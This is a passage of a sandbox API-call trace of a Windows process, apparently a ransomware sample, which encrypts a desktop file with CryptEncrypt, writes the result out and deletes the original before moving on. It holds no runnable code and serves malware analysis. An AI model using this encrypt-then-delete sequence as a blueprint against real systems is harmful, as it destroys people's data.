(hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0124.085] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2740, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2740*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0124.085] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.086] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0124.087] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0124.087] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.087] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0124.087] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0124.088] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0124.088] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0124.088] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.088] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0124.088] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.089] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x4550, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x4560) returned 1 [0124.089] CharLowerBuffW (in: lpsz="byte[17761]", cchLength=0xb | out: lpsz="byte[17761]") returned 0xb [0124.089] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.089] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b7018*, pdwDataLen=0x144e790*=0x4550, dwBufLen=0x4560 | out: pbData=0x49b7018*, pdwDataLen=0x144e790*=0x4560) returned 1 [0124.089] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.089] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.089] WriteFile (in: hFile=0x2a0, lpBuffer=0x49ae578*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49ae578*, lpNumberOfBytesWritten=0x144f194*=0x4560, lpOverlapped=0x0) returned 1 [0124.091] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0124.091] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0124.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0124.091] CryptDestroyKey (hKey=0x41ac600) returned 1 [0124.091] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.094] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0124.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0124.095] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0124.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.095] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0124.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0124.095] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0124.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.095] FreeLibrary (hLibModule=0x756e0000) returned 1 [0124.095] CloseHandle (hObject=0x258) returned 1 [0124.095] CloseHandle (hObject=0x2a0) returned 1 [0124.096] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv", lpFilePart=0x0) returned 0x20 [0124.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0124.097] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ldhr.mkv")) returned 0x20 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0124.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0124.097] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdf40600, ftCreationTime.dwHighDateTime=0x1d5ebdf, ftLastAccessTime.dwLowDateTime=0x31578900, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x31578900, ftLastWriteTime.dwHighDateTime=0x1d5e365, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="LdhR.mkv", cAlternateFileName="")) returned 0x41ac540 [0124.097] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\ldhr.mkv")) returned 1 [0124.103] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdf40600, ftCreationTime.dwHighDateTime=0x1d5ebdf, ftLastAccessTime.dwLowDateTime=0x31578900, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x31578900, ftLastWriteTime.dwHighDateTime=0x1d5e365, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="LdhR.mkv", cAlternateFileName="")) returned 0 [0124.103] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0124.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0124.104] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0124.104] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0124.104] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0124.104] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0124.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0124.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0124.104] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0124.104] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0124.105] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0124.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0124.105] RtlAllocateHeap 